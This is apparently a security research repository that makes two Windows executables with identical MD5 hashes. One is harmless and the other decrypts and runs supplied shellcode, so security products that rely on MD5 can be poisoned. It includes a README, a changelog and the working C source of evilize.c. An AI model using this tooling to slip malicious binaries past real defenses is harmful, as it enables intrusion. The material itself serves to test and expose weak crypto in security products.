README.md
Wolves Among the Sheep
======================

Poisoning security tools that use obsolate crypto.

Please use this code to test if the security products in your reach use MD5 internally to fingerprint binaries and share your results by issuing a pull request updating the contents of `results/`!

Works-on-a-different-machine-than-mine version, feedback is welcome!

Dependencies
------------

* 32-bit Windows (virtual) machine (64-bit will probably break stuff - not tested)
* Visual Studio 2012 to compile the projects (Express will do)
* [Fastcoll](https://www.win.tue.nl/hashclash/) for collisions
* Optional: Cygwin+MinGW to compile Evilize

Usage
-----

Extract Fastcoll to the `fastcoll` directory. Name the executable `fastcoll.exe`

Use `shepherd.bat` to generate `wolf.exe` and `sheep.exe` (in the VS Development Command Prompt):

```
> shepherd.bat YOURPASSWORD your_shellcode.raw
```

After this step you should have your two colliding binaries (`sheep.exe` and `wolf.exe` in the `evilize` directory).

For more information see the [tutorial of Peter Selinger](http://www.mathstat.dal.ca/~selinger/md5collision/), older revisions of this document or the source code...

How does it work?
-----------------

* `shepherd.bat` executes `shepherd.exe` with the user supplied command line arguments
    * `shepher.exe` generates a header file (`sc.h`) that contains the encrypted shellcode, the password and the CRC of the plain shellcode
* `shepherd.bat` executes the build process of `sheep.exe`
    * `sheep.exe` is built with `sc.h`included by Visual Studio
* `shepherd.bat` executes `evilize.exe`
    * `evilize.exe` calculates a special IV for the chunk of `sheep.exe` right before the block where the collision will happen
    * `evilize.exe` executes `fastcoll.exe` with the IV as a parameter
         * `fastcoll.exe` generates two 128 byte colliding blocks: `a` and `b`
    * `evilize.exe` replaces the original string buffers of `sheep.exe` so that they contain combinations `a` and `b`
    * The resulting files (`evilize/wolf.exe` and `evilize/sheep.exe` ) have the same MD5 hashes but behave differently. The real code to be executed only appears in the memory of `evilize/wolf.exe`.

References
----------

* [Poisonous MD5 - Wolves Among the Sheep](http://blog.silentsignal.eu/2015/06/10/poisonous-md5-wolves-among-the-sheep/)
* [Peter Selinger: MD5 Collision Demo](http://www.mathstat.dal.ca/~selinger/md5collision/)
* [How to make two binaries with same MD5](http://natmchugh.blogspot.co.uk/2015/05/how-to-make-two-binaries-with-same-md5.html)
* [Stop using MD5 now!](http://jumpespjump.blogspot.hu/2014/03/stop-using-md-5-now.html)

LICENSE
-------

Licenced under GNU/GPL if not otherwise stated.



evilize/ChangeLog
ChangeLog

v0.2p 2015/06/06
    (2015/06/06) VPB1 - Stripped down version to demonstate MD5 Poisoning

v0.2 2011/10/11
	(2011/10/11) PS1 - fixed compiler over-optimization bug ("no crib
	found"). Reported by Borja Burgos.

v0.1 2006/02/18
	Initial public release



evilize/evilize.c
/* Copyright (C) 2006 Peter Selinger. This file is distributed under
   the terms of the GNU General Public License. See the file COPYING
   for details. */

/* evilize.c: a program to create pairs of files with identical MD5
   hash, from a template. The template must contain two copies of a
   "crib" string defined in crib.h. The crib strings will be replaced,
   in two different ways, to create a "good" and an "evil" version of
   the file. In the "good" version, the two crib strings are replaced
   by the same data, in the "evil" version, they are replaced by
   different data. This is done in such a way that the "good" and
   "evil" files have the same MD5 hash. */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <getopt.h>
#include <errno.h>
#include <sys/types.h>
#include <unistd.h>
#include <time.h>
#include <byteswap.h>

#include "md5.h"
#include "md5coll_lib.h"
#include "crib.h"

#define NAME "evilize"

static char *crib = CRIB;

#define LBUFSIZE 1024
#define FASTCOLL_CMD "..\\\\fastcoll\\\\fastcoll.exe -i %08x%08x%08x%08x -o a b"

int find_crib(FILE *fin){
  char buf[64];
  char last_buf[64];
  int r;
  int i;
  
  while (1) {
    r = fread(buf, 1, 64, fin);
    if (r < 64) {
      return 1;
    }
    for (i=0; i<64; i+=8) {
      if (memcmp(buf+i, crib, 64-i) == 0) {
		return ftell(fin)-64+i;
      }
    }
	memcpy(last_buf,buf,64);
  }
	  
}

/* find the initial vector required to evilize FILE, return it in
   IV. Returns 1 if crib was not found. */
static int find_iv(FILE *fin, unsigned int IV[4]) {
  struct md5_ctx ctx;
  char buf[64];
  int r;
  int i;

  md5_init_ctx(&ctx);

  while (1) {
    r = fread(buf, 1, 64, fin);
    if (r < 64) {
      return 1;
    }
    for (i=0; i<64; i++) {
      if (memcmp(buf, crib+i, 64) == 0) {
		goto crib_found;
      }
    }
    md5_process_block(buf, 64, &ctx);
  }
 crib_found:
  /* find md5 collision for the given ctx initial value */

  IV[0] = ctx.A;
  IV[1] = ctx.B;
  IV[2] = ctx.C;
  IV[3] = ctx.D;
  
  return ftell(fin);
}

/* print usage information */

static void usage(FILE *fout) {
  fprintf(fout, "%s %s. Create a pair of files with the same MD5 hash, from a template.\n", NAME, VERSION);
  fprintf(fout, "Templates are generated by linking against goodevil.o.\n");
  fprintf(fout, "\n");
  fprintf(fout, "Usage: %s [options] infile\n", NAME);
  fprintf(fout,
"Options:\n"
"    -h, --help              print this help message and exit\n"
"    -V, --version           print version info and exit\n"
"    -L, --license           print license info and exit\n"
"    --                      end of options, filename follows\n");
}

/* print version and copyright information */
static void version(FILE *fout) {
  fprintf(fout, "%s %s. Create a pair of files with the same MD5 hash, from a template.\n", NAME, VERSION);
  fprintf(fout, "Copyright (C) 2006 Peter Selinger.\n");
  fprintf(fout, "Collision generator: Copyright (C) 2005 Patrick Stach <pstach@stachliu.com>.\n");
  fprintf(fout, "Implementation of paper by Xiaoyun Wang, et al.\n");
}

static void license(FILE *fout) {
  fprintf(fout, "%s %s. Create a pair of files with the same MD5 hash, from a template.\n", NAME, VERSION);
  fprintf(fout, "Copyright (C) 2006 Peter Selinger.\n");
  fprintf(fout, "Collision generator: Copyright (C) 2005 Patrick Stach <pstach@stachliu.com>.\n");
  fprintf(fout, "Implementation of paper by Xiaoyun Wang, et al.\n");
  fprintf(fout, "\n");
  fprintf(fout,
  "This program is free software; you can redistribute it and/or modify\n"
  "it under the terms of the GNU General Public License as published by\n"
  "the Free Software Foundation; either version 2 of the License, or\n"
  "(at your option) any later version.\n"
  "\n"
  "This program is distributed in the hope that it will be useful,\n"
  "but WITHOUT ANY WARRANTY; without even the implied warranty of\n"
  "MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n"
  "GNU General Public License for more details.\n"
  "\n"
  "You should have received a copy of the GNU General Public License\n"
  "along with this program; if not, write to the Free Software\n"
  "Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.\n"
  "\n"
  "Some parts of this code are distributed under a Modified BSD License;\n"
  "see the source code and the file MBSD-LICENSE for details.\n"
  );
}

static struct option longopts[] = {
  {"help",         0, 0, 'h'},
  {"version",      0, 0, 'V'},
  {"license",      0, 0, 'L'},
  {"iv",           0, 0, 'i'},
  {0, 0, 0, 0}
};

static char *shortopts = "hVLi";

uint32_t swap_uint32( uint32_t val )
{
    val = ((val << 8) & 0xFF00FF00 ) | ((val >> 8) & 0xFF00FF ); 
    return (val << 16) | (val >> 16);
}

int main(int ac, char *av[]) {
  int r;
  unsigned int IV[4];
  int c;
  int count;
  FILE *fin;
  FILE *fa;
  FILE *fb;
  FILE *fsheep;
  FILE *fwolf;
  int pos;
  int off;
  int i=0;
  unsigned char a[128];
  unsigned char b[128];
  unsigned char copybuf[192];
  unsigned char ch;
  unsigned char ch_wolf,ch_sheep;
  char *cmd;

  /* command line options */
  char *infile = NULL;

  while ((c = getopt_long(ac, av, shortopts, longopts, NULL)) != -1) {
    switch (c) {
    case 'h':
      usage(stdout);
      exit(0);
      break;
    case 'V':
      version(stdout);
      exit(0);
      break;
    case 'L':
      license(stdout);
      exit(0);
      break;
    case '?':
      fprintf(stderr, "Try --help for more information.\n");
      exit(1);
      break;
    }
  }
  count = ac-optind;
  if (count < 1) {
    fprintf(stderr, "No filename given. Try --help for more information.\n");
    exit(1);
  } else if (count > 1) {
    fprintf(stderr, "Too many filenames given. Try --help for more information.\n");
    exit(1);
  }
  infile = av[optind];
    
  fin = fopen(infile, "rb");
  if (!fin) {
    fprintf(stderr, "%s: %s: %s\n", NAME, infile, strerror(errno));
    exit(1);
  }
    
  r = find_iv(fin, IV);
  rewind(fin);
  pos=find_crib(fin);
  off=r-pos-64;
  printf("CRIB START: %d\n",pos);
  
  fclose(fin);
	
  if (pos == -1 || r == 1) {
    fprintf(stderr, "%s: %s: no crib found.\n", NAME, infile);
    exit(1);
  }
  
  fprintf(stdout, "%08x%08x%08x%08x\n", swap_uint32(IV[0]), swap_uint32(IV[1]), swap_uint32(IV[2]), swap_uint32(IV[3]));
  cmd=(char*)malloc(strlen(FASTCOLL_CMD)+16+1);
  sprintf(cmd,FASTCOLL_CMD,swap_uint32(IV[0]), swap_uint32(IV[1]), swap_uint32(IV[2]), swap_uint32(IV[3]));
  printf("%s\n",cmd);

  system(cmd);

  fa=fopen("a","rb");
  fb=fopen("b","rb");
  fread(a,128,1,fa);
  fread(b,128,1,fb);
  fclose(fa);
  fclose(fb);
  fin = fopen(infile, "rb");
  fsheep = fopen("sheep.exe","wb"); 
  fwolf = fopen("wolf.exe","wb");
  printf("Copybuf start: %d end: %d \n",pos-16,pos+176);
  while(!feof(fin)){
	ch=fgetc(fin);
	//printf("Difference start: %d end: %d \n",pos+16,pos+128+16);
	if (ftell(fin)>pos+off && ftell(fin)<=pos+128+off){
		ch_sheep=a[ftell(fin)-(pos+off)-1];
		ch_wolf=b[ftell(fin)-(pos+off)-1];
	}
	else{
		ch_wolf=ch;
		ch_sheep=ch;
	}
	
	if (ftell(fin)>pos && ftell(fin)<=pos+192){
		copybuf[i++]=ch_wolf;
	}
	//printf("Copybuf start: %d end: %d \n",pos+200,pos+200+192);
	if (ftell(fin)>pos+200 && i>0){
		ch_wolf=copybuf[192-i];
		ch_sheep=copybuf[192-i];
		i--;
	}
	fputc(ch_sheep,fsheep);
	fputc(ch_wolf,fwolf);
  }
  fclose(fwolf);
  fclose(fsheep);
  fclose(fin);
  return 0;
}

